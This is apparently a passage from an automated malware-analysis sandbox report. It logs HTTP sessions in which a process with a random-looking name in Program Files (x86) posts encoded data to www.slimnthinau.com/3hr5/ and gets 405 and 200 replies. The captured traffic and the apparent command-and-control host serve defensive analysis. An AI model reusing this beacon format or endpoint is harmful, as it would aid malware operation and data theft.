                                                                                                                              Data Ascii: TZd=pua0tTD0XFePABqzo+Yumdyiw89cy6MqpZ/gZ7D1fy4/ZnZjYZhUETbK6fFqpPR7qblcYPrcWvc2eyHrqRzg0Ku1nr2axubMd5ACxtcHMEOdv32bnldtBfjnMQTuImKHT+EgPCS8hLIGwrLyoX0xatIfRsCXX38VSmo6C+un2SYA3g7RZgfA0MZWr8jUh3TUfqCJaFTGVeSpmph/3KMuaEAWnigRQiwhmgMFYkYZF67gKNuKqyaZd5uKfLBoEuDX36PZbyq2yNnrFjI3o0ZfGLFFjB0L0GBGIvWpSnAmZEjuqrCJU32C5RdQh/+UKwv0MshBAhkJipc98uURjGgl1qES0WhN8goJX7Khv/Uj4rkNECfU65CvJpRujjY8nKTx8BD/X2ovA6JY7OIKMxWs66PKwv+0pGqYmL/qBlrgXslup+9zaTVzQ0/41XJ1NeZCmxOjlGsGfv5WfLJFYO0gKgZtkMIhT95C3kPva/BTfy2tJtWTHh8irDg8fge7U/RugnC0mtY=
                                                                                                                              Dec 4, 2023 15:24:24.122899055 CET353INHTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:24:24 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              27192.168.11.205015891.195.240.117808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:24:26.644640923 CET6484OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.slimnthinau.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.slimnthinau.com
                                                                                                                              Referer: http://www.slimnthinau.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 70 75 61 30 74 54 44 30 58 46 65 50 41 42 71 7a 6f 2b 59 75 6d 64 79 69 77 38 39 63 79 36 4d 71 70 5a 2f 67 5a 37 44 31 66 79 67 2f 5a 53 56 6a 4b 2f 70 55 48 54 62 4b 6b 50 46 76 70 50 51 72 71 66 4a 51 59 50 57 72 57 73 30 32 65 68 2f 72 72 69 62 67 78 4b 75 30 37 37 32 59 31 75 62 2b 64 35 63 57 78 74 4a 36 4d 33 53 64 75 78 47 62 6c 6d 31 73 62 76 6a 6c 4d 51 54 79 43 47 4b 31 54 2f 55 4b 50 43 65 38 68 4a 38 47 2b 39 48 79 71 45 63 78 42 74 49 51 59 4d 43 4d 63 58 38 61 53 6d 38 75 43 2b 75 5a 32 57 41 41 33 67 62 52 59 68 66 50 30 73 5a 57 30 4d 6a 56 72 58 58 51 66 70 32 52 61 46 50 47 56 5a 4f 70 6e 4a 68 2f 31 6f 6f 74 61 6b 42 66 6a 69 67 47 55 69 39 4e 6d 68 6f 52 59 6c 4d 5a 46 4b 76 67 4c 36 36 4b 70 54 61 5a 54 35 75 55 43 37 41 75 52 65 44 4c 33 36 2f 2f 62 7a 4b 35 79 4b 66 72 46 43 6f 33 6a 77 74 59 42 72 46 48 73 68 31 4a 2b 57 39 43 49 76 47 4c 53 6e 41 32 5a 41 37 75 71 59 4b 4a 54 43 43 42 36 42 63 59 74 66 2b 42 45 51 71 37 4d 74 4e 4a 41 68 38 5a 69 75 38 39 38 4f 55 52 6d 68 38 6b 2f 61 45 4a 32 57 68 54 2f 51 6f 65 58 37 33 77 76 36 31 63 35 59 51 4e 45 79 50 55 72 5a 43 73 62 5a 52 31 71 44 59 2b 6a 4b 54 78 38 42 47 4d 58 32 6b 76 41 49 5a 59 71 74 51 4b 4a 69 75 73 38 36 50 54 77 76 2b 6c 70 47 58 6d 6d 4c 32 4a 42 6b 37 65 58 71 46 75 70 71 78 7a 5a 52 39 30 57 45 2f 39 69 48 49 39 4a 65 64 56 6d 78 53 72 6c 43 4e 78 66 64 39 57 65 4c 35 46 63 4f 30 68 4f 41 5a 71 30 63 49 4a 59 64 31 4f 33 6b 53 53 61 2b 46 35 66 77 6d 74 59 4b 76 34 44 31 49 59 35 7a 38 75 58 48 4f 72 55 39 56 38 6c 6e 32 6e 2b 49 54 4e 6d 45 4d 6a 41 4d 69 68 37 6b 59 63 45 76 72 6e 34 59 2f 77 48 30 74 4f 36 44 69 34 39 76 37 50 34 77 73 65 43 70 4c 44 64 54 66 53 35 53 65 56 76 6d 73 73 4e 36 55 48 6f 58 63 70 6d 2f 36 6d 39 45 66 56 61 30 4a 66 62 57 7a 61 72 42 66 66 77 34 78 30 31 59 72 69 4e 63 43 37 45 6b 6e 47 4c 4d 70 32 34 6b 6e 69 36 6a 45 4f 56 38 76 2f 72 4b 50 70 65 75 61 72 6c 2f 4f 6b 37 32 47 63 79 69 6e 65 53 66 6b 50 50 44 2f 6c 72 41 75 32 73 51 71 42 51 58 4d 65 44 6f 67 5a 45 54 77 6a 47 41 2f 72 6a 4d 6e 50 74 65 37 6e 67 6c 5a 6a 6f 51 62 53 55 2b 6e 49 72 62 57 72 79 78 75 5a 44 34 2b 6a 62 43 4d 68 45 59 36 4f 44 4c 73 35 2f 32 76 69 6c 66 43 39 62 4a 37 76 39 54 73 77 32 6d 6d 52 53 65 41 4f 44 65 2f 2f 48 6e 69 33 4b 4b 76 44 38 6f 49 6a 64 37 66 55 77 6a 35 62 4b 33 51 36 54 50 65 51 2b 4b 65 73 57 47 54 35 6f 79 6e 55 61 2b 42 42 76 49 6f 43 61 4a 55 44 43 4e 37 44 4c 49 62 35 53 6e 41 67 65 65 46 4f 4b 75 44 53 38 6b 6a 41 33 34 52 55 70 5a 69 55 36 65 6e 67 45 73 65 67 42 65 45 66 6b 43 7a 47 6c 38 41 38 59 4b 36 77 33 47 6b 2b 59 6a 61 7a 51 41 54 33 2b 70 32 43 36 42 77 53 77 48 57 39 58 51 41 4a 74 4a 31 78 6d 32 6b 32 4f 6b 56 36 2f 2b 47 73 2f 52 32 77 71 4d 31 5a 58 4d 76 2b 72 32 57 36 4f 5a 54 5a 58 33 6e 44 79 73 2f 48 2f 5a 42 65 56 71 67 72 48 38 78 6d 58 46 42 6c 4c 62 6c 46 6a 7a 50 48 6d 6f 57 7a 31 57 52 49 69 42 6d 59 6f 64 31 72 54 50 7a 6a 77 33 37 62 68 33 77 4e 4a 73 72 63 70 73 42 78 71 34 48 66 77 7a 62 41 56 44 66 70 55 76 78 6e 64 45 65 73 5a 68 67 48 74 35 6e 69 36 69 31 70 75 78 4a 39 30 68 31 75 59 5a 67 4c 5a 66 39 45 43 44 43 37 43 34 79 49 77 38 35 71 78 61 52 4b 36 66 50 66 69 47 4b 2b 55 4a 45 62 71 65 72 78 74 63 49 53 69 41 4e 69 5a 69 38 36 56 6a 49 42 64 57 7a 45 70 4f 68 58 5a 77 38 6c 36 76 56 7a 6e 5a 36 62 55 54 63 42 57 4b 59 43 4f 35 50 4b 76 55 6c 4b 56 39 50 59 33 6e 46 64 4f 63 44 2b 70 2f 6e 4c 56 69 51 70 79 4a 78 6e 61 68 45 46 69 78 37 4c 6f 77 73 69 4c 4e 6f 46 5a 71 61 43 4d 61 4f 46 70 57 59 4a 4f 44 72 70 53 76 79 54 61 56 4c 4f 39 32 38 57 72 65 65 6a 7a 75 2b 58 54 78 68 52 70 49 54 77 4c 4e 79 4e 2b 4a 64 52 6f 6a 64 66 6a 6e 56 30 73 56 79 49 55 6a 62 6a 31 62 34 6f 63 7a 31 74 61 7a 6a 45 44 2b 57 4f 53 4d 41 65 2b 4b 61 63 33 68 2f 69 48 76 39 52 4e 71 6e 41 58 39 56 4a 71 4d 66 58 46 77 64 68 34 57 64 6a 4c 57 34 79 67 62 5a 47 2f 57 2b 70 6b 2b 63 39 76 75 52 34 4c 61 56 7a 2b 72 6f 68 5a 31 65 42 6a 6f 38 51 56 37 69 34 78 55 52 69 66 79 68 55 77 54 46 56 6f 71 70 49 44 44 78 33 37 55 4f 50 6e 35 55 45 66 66 5a
                                                                                                                              Data Ascii: TZd=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
                                                                                                                              Dec 4, 2023 15:24:26.644727945 CET6484OUTData Raw: 77 51 58 38 38 6f 64 6b 38 50 69 68 49 33 7a 30 38 46 72 6a 74 61 5a 4b 61 47 72 79 76 70 4a 59 57 45 30 32 35 55 57 42 70 57 6f 49 46 39 71 52 35 75 69 76 34 31 67 76 46 6e 77 51 58 70 35 76 59 6f 4c 70 4c 4d 55 47 78 6b 76 30 66 51 53 39 54 66
                                                                                                                              Data Ascii: wQX88odk8PihI3z08FrjtaZKaGryvpJYWE025UWBpWoIF9qR5uiv41gvFnwQXp5vYoLpLMUGxkv0fQS9TfsVRIOmXVXRdZcwG9OlVWsDoujwwoPuXWYbaibiN6l8lgbHWRu1BlLGjBEgCPtSbmwKMgz7gZwlMH0rhTWmaXux24A3Mi4ub/yDG1MU/x9XAnjNw7/fpjp8D86pkE+7FMdivWbeoJgf/rOV+HewxM+GVAXFzx2cgS+
                                                                                                                              Dec 4, 2023 15:24:26.827408075 CET2626OUTData Raw: 67 6e 71 67 34 53 30 2b 4f 73 58 53 36 49 71 50 51 30 76 42 5a 39 75 4a 49 4e 79 2b 65 6b 54 69 79 53 55 34 47 79 71 74 4e 64 7a 4e 64 53 39 35 66 4a 2b 34 53 4a 6c 62 6d 58 50 61 37 58 53 6e 34 64 30 4a 54 41 64 36 54 72 7a 30 35 31 34 58 6b 6d
                                                                                                                              Data Ascii: gnqg4S0+OsXS6IqPQ0vBZ9uJINy+ekTiySU4GyqtNdzNdS95fJ+4SJlbmXPa7XSn4d0JTAd6Trz0514XkmrZIdInCNtEs04ea4cuZMQLJ+h0lQglNoxjTYHCbuD0GFRZbdJfA1IpQrdC8tBTuhYnKyd53YqEJpdsKlqW554bxYUZkfBr60ebXNSyzi8K1Z4phqywMFdMnFDJbBy6elkiawr5or3K4Xwn2RRN5v/ZmDsHLWRZkiY
                                                                                                                              Dec 4, 2023 15:24:26.827753067 CET1340OUTData Raw: 73 73 36 67 44 49 74 45 58 32 4d 52 34 4c 79 62 56 75 34 6c 47 55 4a 6c 42 38 4b 5a 59 32 4c 4a 2b 36 6c 4b 68 50 77 6d 64 6f 69 44 58 6a 59 4c 2b 6a 65 72 6f 36 7a 48 71 37 59 36 59 30 2f 6d 79 6d 73 6c 47 77 73 78 52 43 54 49 39 2f 33 59 48 4f
                                                                                                                              Data Ascii: ss6gDItEX2MR4LybVu4lGUJlB8KZY2LJ+6lKhPwmdoiDXjYL+jero6zHq7Y6Y0/mymslGwsxRCTI9/3YHOs59FaSG5SNWqs5ELBYuQEiksgoL4RPbaEKBGA2Ds8AeZfzHUwEAGKXRlvi+kwQnTd4DsyiyQegPAvttdeCMHEInIvbt8qGd96XSBDsfUeWPGnmoce8/ZTR53kY0jcPuWEwhEr7SGlA907nTSnxbJ0D9ImZ0UsQFCF
                                                                                                                              Dec 4, 2023 15:24:26.827861071 CET353INHTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:24:26 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                                                                                                                              Dec 4, 2023 15:24:26.827934027 CET14200OUTData Raw: 42 42 70 42 62 41 37 67 6f 41 47 48 41 4c 75 77 49 6f 6a 67 34 6d 5a 42 47 34 6a 30 4a 6c 43 32 6f 32 31 55 45 32 74 2f 32 72 43 66 32 68 71 4b 55 73 50 71 68 76 6d 36 6c 6b 6f 79 44 79 6e 76 79 5a 64 71 42 46 37 6a 76 74 74 68 59 39 7a 33 67 54
                                                                                                                              Data Ascii: BBpBbA7goAGHALuwIojg4mZBG4j0JlC2o21UE2t/2rCf2hqKUsPqhvm6lkoyDynvyZdqBF7jvtthY9z3gTHzu2FdWp7LfmwURS2PMR4brOWtqSg7RT0GAb25KIk/LGtvXm0Tgb41JNKkzwqfpgQtJl1qOxdc9tTnc38u7FupwgVmiIw7hcwAfwG1r/a/HocqQCjtOGlvJWGKj1n48FuWBX15rWwA1s1tAIkfOD7E8OHz27iD06Q
                                                                                                                              Dec 4, 2023 15:24:26.828262091 CET5198OUTData Raw: 61 76 38 68 57 44 73 6a 66 43 47 48 46 6b 36 4e 74 4e 49 7a 75 65 57 4f 6d 70 6a 42 7a 30 6d 45 2f 62 33 70 64 31 74 58 74 37 70 42 47 6c 35 64 59 44 5a 48 37 53 49 48 53 59 39 41 63 43 47 56 5a 4e 7a 4c 2b 4a 4e 4c 62 49 43 65 77 52 2b 2f 51 75
                                                                                                                              Data Ascii: av8hWDsjfCGHFk6NtNIzueWOmpjBz0mE/b3pd1tXt7pBGl5dYDZH7SIHSY9AcCGVZNzL+JNLbICewR+/Qubso7IsR6uTogF8ADADoOwyJNT7iI0hDOXs4mxMQvJLadjm1BvRbIalTm5B9DOeOc7gC76hI8Ad4xivbFRVBZE93oPgKPi51g3oL9U9h1sj8cSys9JnhouMt0zjB17VAfKEBdPcfFBWzA9YaeTuQKkyh7vi+/fvW2D
                                                                                                                              Dec 4, 2023 15:24:26.869072914 CET2626OUTData Raw: 75 2f 79 4b 4c 4c 35 6c 46 35 72 43 30 57 34 2f 53 67 49 2b 64 49 54 39 53 50 67 6a 35 4b 64 37 5a 6c 6b 49 42 44 6c 49 30 43 57 48 4b 63 67 56 73 30 32 61 4a 6c 61 2f 31 65 48 74 67 79 38 58 49 66 65 47 57 53 45 31 70 51 53 72 36 58 50 4c 4a 63
                                                                                                                              Data Ascii: u/yKLL5lF5rC0W4/SgI+dIT9SPgj5Kd7ZlkIBDlI0CWHKcgVs02aJla/1eHtgy8XIfeGWSE1pQSr6XPLJcppwq1kRS1banwbo4e8DZc6Al6+BFGzk4LfA4PgAWNrZO2Xqwe/cjRWGahohEczXonzCMMI3cnrfHpx5+GbDwWTUaByCFpNwXL5vy1dpTnmwhjvAuHc6rLu15vdnm/0F9kboH/LgUqkckzWpg4wxxZmKtQC35jIEDP
                                                                                                                              Dec 4, 2023 15:24:27.009849072 CET1340OUTData Raw: 47 50 62 41 44 55 4f 6c 64 4f 46 49 31 6e 61 49 58 46 45 67 6f 41 52 46 4d 5a 64 7a 6b 69 58 69 79 74 66 50 37 72 4e 45 66 72 63 56 36 71 71 61 59 49 4a 6a 45 74 66 75 55 38 6a 74 56 4d 72 37 57 6c 54 37 4a 6d 47 62 70 56 49 33 35 74 46 2f 49 4b
                                                                                                                              Data Ascii: GPbADUOldOFI1naIXFEgoARFMZdzkiXiytfP7rNEfrcV6qqaYIJjEtfuU8jtVMr7WlT7JmGbpVI35tF/IKUb1IEoqqi8o6wex1rEYegesx+zXYoEF1D5R6zZZzgpPQytEZuu3ob1IUJQe527MfQhbEu7uisxzh35XIExJe+V6dfLhp+poYQFMOnfZRA8WIBkBCs8uhqVUsG9Y77Lc5DsU7nwnivCnC09p3kkjvBI+wThZ0UkAEc
                                                                                                                              Dec 4, 2023 15:24:27.010015965 CET2626OUTData Raw: 6f 54 55 56 45 6e 78 51 43 64 6d 2b 51 77 38 46 64 6e 30 65 32 44 6d 56 51 66 33 77 38 38 64 4e 6a 49 45 47 6e 52 6c 5a 68 48 51 75 4a 70 45 61 6b 46 52 43 44 77 4f 49 5a 42 62 42 78 75 75 38 67 69 73 76 34 6b 73 66 49 55 79 34 59 69 6b 4e 41 62
                                                                                                                              Data Ascii: oTUVEnxQCdm+Qw8Fdn0e2DmVQf3w88dNjIEGnRlZhHQuJpEakFRCDwOIZBbBxuu8gisv4ksfIUy4YikNAbzbqbT1dIERFHYfgNusmwYSPhgtnWIX9FYGmKnI0d9ob0NOYR5wyTsRtupL3XG1UjCmsRurVMdMDDvEOfsW/PaSpn1VSbuL+Ob35bQuWyyJsAqwQs2GeTtZG7g0t21/+rTzB4VuvZCKCvTNRnRnA8EycKe7dxng4IQ
                                                                                                                              Dec 4, 2023 15:24:27.010215044 CET3912OUTData Raw: 4e 34 58 6f 56 6b 70 32 79 4c 4e 34 31 39 37 51 57 65 74 7a 62 58 51 6b 75 74 5a 6f 47 73 36 46 62 68 76 50 4e 70 70 77 57 45 32 6a 71 31 55 77 4e 62 41 42 51 2b 56 63 31 38 50 69 75 74 77 68 57 4f 71 72 61 41 59 61 79 46 30 35 62 41 52 57 47 42
                                                                                                                              Data Ascii: N4XoVkp2yLN4197QWetzbXQkutZoGs6FbhvPNppwWE2jq1UwNbABQ+Vc18PiutwhWOqraAYayF05bARWGBILnvwh3L3tRgAxFaJxnHI1Xe2BVcoLlsIgltcJNMDJ78KziOrLN9qcavCjE3Pj2jp9/bYGDoTMbC7hr/S1ta+TK6qiLq5OP2CkO4LVKjNEVVoORVibd+i95+kmrHQlFcSTj+1ROVycMyPhvTUW5HrvoBb+zzAQeDe
                                                                                                                              Dec 4, 2023 15:24:27.010387897 CET1340OUTData Raw: 66 4e 4b 4c 44 64 53 74 46 43 43 45 44 70 42 4e 45 73 63 57 41 4d 79 34 78 43 44 6f 50 64 52 52 6b 38 4c 6f 55 74 4c 2b 65 35 72 2b 53 6c 69 5a 70 49 46 7a 30 64 61 43 79 74 37 4a 2f 69 44 6e 35 75 44 41 78 58 4e 4b 6f 41 41 37 74 4a 2f 71 6a 78
                                                                                                                              Data Ascii: fNKLDdStFCCEDpBNEscWAMy4xCDoPdRRk8LoUtL+e5r+SliZpIFz0daCyt7J/iDn5uDAxXNKoAA7tJ/qjx1tRMYh8FCb7ztJ2fYKZlAqh2ur4xX9IYbixBBL8BkqfDfgK/Kk1RAD3Ai9VFsjZ9uILZp0hgWv5uddMAemXAHQGRuDqi7XMW4kWTveUX7Kxt4Ikm8RRhQGoq8n5zJ++gvhcr+Qq+J9NFEx0DYatWJe499oN8HGnt/


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              28192.168.11.205015991.195.240.117808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:24:29.345392942 CET533OUTGET /3hr5/?TZd=ksyUunDrVEa0KTu9vPYxs761+eAaxKot9rPDN6rYUiwEC3plPpQTFjv1rO9K0/xZs75gUsnXDeEoWRSVvif2xqzz7ty8+MasXQ==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.slimnthinau.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:24:29.579713106 CET1340INHTTP/1.1 200 OK
                                                                                                                              date: Mon, 04 Dec 2023 14:24:29 GMT
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              vary: Accept-Encoding
                                                                                                                              x-powered-by: PHP/8.1.17
                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              pragma: no-cache
